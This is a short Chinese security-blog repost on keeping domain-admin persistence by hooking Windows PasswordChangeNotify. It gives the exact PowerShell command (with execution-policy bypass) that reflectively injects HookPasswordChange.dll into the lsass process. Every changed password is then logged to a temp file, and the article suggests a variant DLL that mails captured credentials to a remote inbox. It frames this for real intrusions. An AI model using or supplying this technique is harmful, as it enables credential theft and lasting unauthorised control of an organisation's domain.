微信号:i77169

介绍:黑白之道,普及网络安全知识!

维持域管权限的一些简单办法

2019-01-12 09:47 黑白之道


可利用 Hook PasswordChangeNotify 的方式,无需重启系统,且能实时记录修改的密码,只要目标机器不重启一般都不会失效,具体方法很简单,首先,准备好 HookPasswordChange.dll 和 Invoke-ReflectivePEInjection.ps1 [主要是用它来把我们事先准备好的 HookPasswordChange.dll 注入到 lsass 进程中,这里有点类似劫持的意思],实际渗透中,并不一定非要把它记录在目标系统的本地文件中[记录到的密码默认放在c:\windows\temp\passwords.txt文件中],你也可以尝试直接把记录到的账号发送到远程指定的邮箱中[有人已提供改进过的dll],自己去谷歌找找,应该可以找到,下面是在本地测试的实际效果:


# powershell –exec bypass –Command "& {Import-Module 'C:\Invoke-ReflectivePEInjection.ps1';Invoke-ReflectivePEInjection-PEPath C:\HookPasswordChange.dll –procname lsass}"



实际的效果如下




文章来源:klion's blog

原文链接:

https://klionsec.github.io/2016/08/16/Hook-PasswordChangeNotify/

 
黑白之道 更多文章 海底捞放动作电影,真是“独乐乐不如众乐乐” 小伙购买黑客工具 疯狂对“网站”进行勒索攻击 干货分享 | APT攻防学习资料 “猎龙者”终落入法网,“培训班”全员成被告 漠视、逃避网络安全义务?将严厉追责!
猜您喜欢 Unity大师课程北京站报名开启 我眼中的技术地图 Ceph V10.1.0版本-Jewel(候选版本)发布 从源码角度理解如何获取 View 的宽高 腾讯安全专家周斌:“安全”是场要耐得住寂寞的马拉松